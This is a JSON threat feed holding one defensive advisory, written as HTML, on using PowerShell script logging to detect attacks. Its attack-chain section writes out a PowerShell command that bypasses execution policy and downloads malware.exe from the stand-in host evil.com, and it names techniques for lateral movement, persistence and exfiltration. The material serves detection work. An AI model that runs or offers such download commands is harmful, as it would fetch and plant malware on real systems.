{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/script-logging/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["PowerShell"],"_cs_severities":["medium"],"_cs_tags":["powershell","script-logging","threat-detection"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003ePowerShell is a powerful scripting language that is frequently abused by threat actors for various malicious purposes, including initial access, lateral movement, and persistence. Enabling and monitoring PowerShell script logging is critical for defenders to gain better visibility into attacker activities. The increased logging provides detailed insights into the commands executed within the PowerShell environment, allowing security teams to identify and respond to suspicious behavior more effectively. This brief focuses on the importance of script logging and provides guidance on how to implement detections based on the collected logs.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system, possibly through exploiting a vulnerability or utilizing stolen credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a PowerShell script to download a malicious payload from a remote server using \u003ccode\u003epowershell.exe -exec bypass -c (New-Object System.Net.WebClient).DownloadFile('http://evil.com/malware.exe', 'C:\\Windows\\Temp\\malware.exe')\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell to bypass execution policy restrictions, allowing unsigned scripts to run, using \u003ccode\u003eSet-ExecutionPolicy Bypass -Scope Process\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages PowerShell to perform reconnaissance, gathering information about the compromised system and network using commands such as \u003ccode\u003eGet-NetIPConfiguration\u003c/code\u003e and \u003ccode\u003eGet-ADDomain\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell to move laterally to other systems on the network by using the \u003ccode\u003eInvoke-Command\u003c/code\u003e cmdlet.\u003c/li\u003e\n\u003cli\u003eThe attacker employs PowerShell to establish persistence by creating a scheduled task that executes a malicious script at regular intervals using \u003ccode\u003eRegister-ScheduledTask\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker utilizes PowerShell to exfiltrate sensitive data from the compromised network to an external server via Base64 encoding and web requests.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems can lead to data breaches, financial losses, and reputational damage. Without proper logging and monitoring of PowerShell activity, organizations may remain unaware of malicious actions, leading to prolonged compromise and greater impact. PowerShell-based attacks can bypass traditional security controls, making them especially dangerous. Enabling comprehensive logging is essential to mitigating this risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable PowerShell script block logging to capture the contents of executed scripts (reference: Overview section).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect suspicious PowerShell activity (reference: rules section).\u003c/li\u003e\n\u003cli\u003eMonitor for PowerShell processes spawning from unusual parent processes (e.g., Microsoft Word) as an indicator of potential exploitation (reference: Attack Chain Step 2).\u003c/li\u003e\n\u003cli\u003eCreate alerts for PowerShell commands that bypass execution policies, download files from the internet, or attempt to exfiltrate data (reference: Attack Chain steps 2, 3, and 7).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-29T12:00:00Z","date_published":"2024-01-29T12:00:00Z","id":"https://feed.craftedsignal.io/briefs/2024-01-29-powershell-script-logging/","summary":"This brief highlights the importance of PowerShell and script logging to improve threat detection capabilities within an organization's environment, focusing on increased visibility into malicious activities.","title":"Enhancing Detection Capabilities Through PowerShell Script Logging","url":"https://feed.craftedsignal.io/briefs/2024-01-29-powershell-script-logging/"}],"language":"en","title":"CraftedSignal Threat Feed - Script-Logging","version":"https://jsonfeed.org/version/1.1"}